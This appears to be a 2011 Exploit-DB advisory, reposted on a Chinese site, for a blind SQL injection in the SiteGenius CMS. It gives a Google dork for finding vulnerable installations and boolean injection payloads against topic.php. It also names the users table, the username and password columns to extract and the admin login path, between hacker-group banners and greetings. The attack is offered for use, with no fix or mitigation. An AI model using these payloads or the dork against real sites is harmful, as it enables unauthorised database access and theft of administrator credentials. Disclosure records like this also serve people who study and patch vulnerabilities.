SiteGenius – Blind SQL Injection - 体验盒子

作者： AutoRUN & dR.sqL
日期： 2011-08-02
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/17597/
=====================================================
SiteGeniusBlind SQL injection vulnerability
=====================================================


# Exploit title : SiteGenius Blind SQL injection vulnerability
# Date : 02 \ 08 \ 2011
# Author : AutoRUN& dR.sqL
# Home : HackForums.AL , AutoRUN-Albania.COM , whiteh4t.net,HackingWith.US , 
# Software Link : http://www.sitegenius.com
# Tested on : Windows XP & Linux
# Category : web apps
# Google Dork : inurl:"sitegenius/topic.php?id="
# Versions affected : All

----------------------------------
#~ExpL0!taTi0N ~ #
----------------------------------

Affected files : topic.php & article.php

SQLi (blind) details: Table: users ; Columns: username & password ; Panel (admin): /sitegenius/login.php


Exploit : http://localhost/sitegenius/topic.php?id=1 and 1=1--> TRUE
 http://localhost/sitegenius/topic.php?id=1 and 1=2--> FALSE

w00t!! Blind SQL injection !


 _ ______ _ _ ____ _ _____ 
/ \_ _| |_ ___ |_ \| | | | \ | |( _ ) __| |_ \ _____ _| |
 / _ \| | | | __/ _ \| |_) | | | |\| |/ _ \/\/ _` | |_) | / __|/ _` | |
/ ___ \ |_| | |_ (_) |_ <| |_| | |\| | (_>< | (_| |_ < _\__ \ (_| | |___ 
 /_/ \_\__,_|\__\___/|_| \_\\___/|_| \_|\___/\/\__,_|_| \_(_)___/\__, |_____|
|_|




# Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power , 
R-t33n , Ace Wizard, KubaNnez1 , 1Nj3ct0r-4L, AHG , ssgodfather, DJDukli , b4ti , #tupac.al, CroSs HackForums.AL members & All our friends.

_____ ________ __ _ _ _
 |_ \ _ __ ____ ___| | |___ \| __ ) / \| | |__ __ _ _ __ (_) __ _ _ __ | |
 | |_) | '__/ _ \| | | |/ _` | __) |_ \/ _ \ | | '_ \ / _` | '_ \| |/ _` | '_ \| |
 |__/| | | (_) | |_| | (_| |/ __/| |_) |/ ___ \| | |_) | (_| | | | | | (_| | | | | |_|
 |_| |_|\___/ \__,_|\__,_| |_____|____//_/ \_\_|_.__/ \__,_|_| |_|_|\__,_|_| |_| (_)
 
 
# 2011